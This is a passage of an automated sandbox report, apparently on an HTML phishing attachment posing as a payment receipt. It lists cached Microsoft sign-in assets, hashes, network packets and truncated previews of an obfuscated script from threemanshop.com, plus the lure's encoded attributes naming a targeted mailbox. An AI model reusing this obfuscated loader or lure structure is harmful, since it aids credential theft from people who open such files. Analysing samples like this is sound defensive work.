Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (51612)
Category:	downloaded
Size (bytes):	248873
Entropy (8bit):	4.497852553192381
Encrypted:	false
SSDEEP:	3072:l2pWZLzsdY/SxK7/ehoGBOhpJddI/dMP763ee:RzsdY/zRhpJddI/dQ763ee
MD5:	CDD7C9F0A9339559082811AE8C27ED55
SHA1:	71BDEE5AF5744D27D11E578C0C4980C8F5593F6D
SHA-256:	3D5279984F1C9EED563400ADBCA67390E98C690A909253076383830D9AE04335
SHA-512:	02ED974FFE3A92D1F8F2331053FB537D49E5928AE681BF731140B9400285C99C103CEC90A0FEB85C944DDD40950EEAF33E7EBDED1A4EDE61A23FEB19F67E8EE9
Malicious:	false
URL:	https://threemanshop.com/jssp.js
Preview:	function _0x3801(_0x38548e, _0x3fda2a) {. const _0x3e1a53 = _0x47dd();. return _0x3801 = function(_0x414a71, _0x59aa08) {. _0x414a71 = _0x414a71 - (0x1 * -0x76d + -0x1 * -0x9c7 + -0x1df);. let _0x5cc4e5 = _0x3e1a53[_0x414a71];. return _0x5cc4e5;. }, _0x3801(_0x38548e, _0x3fda2a);.}.const _0x4160fa = _0x3801;.(function(_0x2e3302, _0x2eebde) {. const _0x57f25c = _0x3801,. _0x25ffca = _0x2e3302();. while (!![]) {. try {. const _0x3c66db = parseInt(_0x57f25c(0x43e)) / (0x131b + 0x2157 + -0x3471) + parseInt(_0x57f25c(0x1f1)) / (-0x8ab + -0xa * 0x113 + 0x136b) + parseInt(_0x57f25c(0x548)) / (-0x1db2 + -0x152e + 0x32e3) + -parseInt(_0x57f25c(0xb5b)) / (-0x2383 * 0x1 + -0x2a2 * -0x6 + 0x13bb) * (-parseInt(_0x57f25c(0x942)) / (-0x1 * 0x1003 + 0x1 * 0xbdd + 0x42b)) + parseInt(_0x57f25c(0xb93)) / (-0x3a1 + 0x1d37 + -0x1990) * (parseInt(_0x57f25c(0x5c6)) / (0x21 * -0x119 + -0x7 * 0x3ff + 0x4039)) + parseInt(_0x57f25c(0x9c6)) / (-0x377 *

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
Category:	downloaded
Size (bytes):	276
Entropy (8bit):	7.316609873335077
Encrypted:	false
SSDEEP:	6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
MD5:	4E3510919D29D18EEB6E3E8B2687D2F5
SHA1:	31522A9EC576A462C3F1FFA65C010D4EB77E9A85
SHA-256:	1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
SHA-512:	DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
Malicious:	false
URL:	https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
Preview:	...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....e.......J).8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
Category:	downloaded
Size (bytes):	199
Entropy (8bit):	6.766983163126765
Encrypted:	false
SSDEEP:	6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
MD5:	21B761F2B1FD37F587D7222023B09276
SHA1:	F7A416C8907424F9A9644753E3A93D4D63AE640E
SHA-256:	72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
SHA-512:	77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
Preview:	..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45667)
Category:	downloaded
Size (bytes):	45806
Entropy (8bit):	5.207605835316031
Encrypted:	false
SSDEEP:	384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
MD5:	80F5B8C6A9EEAC15DE93E5A112036A06
SHA1:	F7174635137D37581B11937FC90E9CB325077BCE
SHA-256:	0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
SHA-512:	B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
Malicious:	false
URL:	https://cdn.socket.io/4.6.0/socket.io.min.js
Preview:	/!. Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (696), with CRLF line terminators
Entropy (8bit):	5.490468244009691
TrID:	HyperText Markup Language (15015/1) 55.58% HyperText Markup Language (12001/1) 44.42%
File name:	Payment Receipt .html
File size:	4'895 bytes
MD5:	b75d9452c7e4b29218ea7b529429df43
SHA1:	4adb8b0f2500013071f5f3fdaf84a39d4df11696
SHA256:	46a6d8e6dde28ff6ef957372da3b0f8a1a8d5126c923ec18508672d29a53f544
SHA512:	1dc291b025eb15de4249c09cd59d8deb801c9d5675a31af066127e8648ddaa1ef8b2aaada7c2990482ca13e640b596aae507d6ffb738df8bdd943c08b1d8153c
SSDEEP:	96:4gJlG9WfosdSTktFBjhe8gtRwSgOnGjE04dCI+4v:41qosd7FFoHtqSOsdCIX
TLSH:	B0A1942D8DA0F5CAA7F932365DA520CCE39150D6D640D5A2B09CA482BF35B38FDC6D70
File Content Preview:	<!DOCTYPE html>..<html point="aHR0cHM6Ly90aHJlZW1hbnNob3AuY29t" id="html" sti="VlZORlVqRTBNRFF5TURJMFZVNUpVVlZGTVRFd05EQTBNVFF6TWpJd01qUXlNREkwTURReE5EQTBNVEV6TWc9PQ==" vic="bookkeeper@tuxedogov.org" lang="en">....<head>....</head>....<body id="allbody">.

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 23:27:09.437480927 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.437510967 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.437611103 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.437923908 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.437937975 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.478669882 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.478709936 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.478945017 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.479012966 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.479029894 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.561913967 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.561990976 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.562074900 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.562242031 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.562272072 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.562328100 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.562549114 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.562566042 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.562580109 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.562659979 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.662781954 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.665266991 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.665283918 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.666908026 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.667108059 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.668051004 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.668051004 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.668260098 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.712521076 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.712824106 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.712882996 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.714550972 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.714725971 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.715512037 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.715521097 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.717434883 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.717538118 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.717669010 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.717688084 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.780184031 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.782409906 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.782435894 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.785655975 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.785734892 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.786191940 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.786205053 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.786433935 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.787632942 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.787652016 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.789299011 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.789362907 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.789659977 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.789892912 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.878706932 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.878739119 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.878782988 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.878804922 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.878804922 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.878827095 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.878839970 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.878855944 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.878892899 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.896014929 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.896030903 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.896070004 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.896078110 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.896114111 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.896114111 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.896119118 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.896171093 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.896176100 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.896186113 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.896234989 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.918826103 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.918834925 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:09.918941021 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:09.949497938 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.949554920 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.973290920 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.973325014 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.973362923 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.973371983 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.973437071 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.973447084 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.973537922 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:09.973587036 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.973856926 CEST	49733	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:09.973871946 CEST	443	49733	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:10.072268009 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.072400093 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.072494984 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.072575092 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.072611094 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.072638035 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.072671890 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.072791100 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.072881937 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.072973013 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.072979927 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.073049068 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.073091030 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.073148012 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.073203087 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.073220015 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.073333979 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.073384047 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.073399067 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.073482990 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.073538065 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.073550940 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.074202061 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.074261904 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.074275017 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.074372053 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.074421883 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.074436903 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.075066090 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.075117111 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.075130939 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.075225115 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.075277090 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.075289965 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.076009035 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.076071024 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.076082945 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.076194048 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.076247931 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.076262951 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.076354980 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.076405048 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.076417923 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.076947927 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.077007055 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.077018976 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.077116013 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.077169895 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.077183008 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.077841043 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.077898979 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.077912092 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.078005075 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.078057051 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.078069925 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.078701973 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.078764915 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.078778028 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.078865051 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.078919888 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.078933001 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.079685926 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.079751968 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.079765081 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.110176086 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.142031908 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:10.176708937 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.176774025 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.176796913 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.176841021 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.176848888 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.176903009 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.176949024 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.176959038 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.176999092 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.177624941 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.177647114 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.177681923 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.178261042 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.178312063 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.178323030 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.178354979 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.178370953 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.178380013 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.178421974 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.179261923 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.179315090 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.179352045 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.179403067 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.180216074 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.180273056 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.181056976 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.181108952 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.182019949 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.182076931 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.182131052 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.182184935 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.182806015 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.182864904 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.182910919 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.182956934 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.183785915 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.183859110 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.184300900 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.184356928 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.184412956 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.184459925 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.185244083 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.185292959 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.280412912 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.280478954 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.280514956 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.280565977 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.280934095 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.280983925 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.281560898 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.281625032 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.281655073 CEST	443	49734	172.67.202.97	192.168.2.4
